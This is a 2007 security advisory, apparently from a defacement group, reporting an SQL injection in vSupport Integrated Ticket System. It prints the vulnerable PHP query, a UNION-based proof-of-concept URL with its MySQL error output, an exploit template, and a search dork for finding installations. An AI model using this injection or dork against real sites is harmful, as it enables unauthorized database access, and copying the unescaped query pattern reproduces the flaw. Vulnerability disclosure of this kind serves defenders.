Security Advisory: vSupport Integrated Ticket System 3.*.* SQL injection

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [Full-disclosure] Wordpress default theme XSS (admin) and other problems
  phpWebThings ==>1.5.2 RFI
  Zen Help Desk ==> Version 2.1 Bypass/
  PHPMyDesk Beta Release 1.0b ==> RFI

From: stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date: 11.06.2007
Subject: vSupport Integrated Ticket System 3.*.* SQL injection

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
               // do not limit the users access
               $fromuseraccess = "";
       }

       // get the info about the ticket first
       if ($ticket = $db->query_first("
               SELECT ticket.*
               " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
               FROM " . TABLE_PREFIX . "ticket as ticket
               " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
               WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
               $fromuseraccess
       "))
       {

+--------------------------------------------------------------------
+ An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.
php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+ output:
+--------------------------------------------------------------------

MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064

Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : http://localhost/4/vBSupport.
php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     :
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

               SELECT ticket.*
               ,icon.title AS icontitle, icon.iconpath
               FROM ticket as ticket
               LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
               WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+ Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------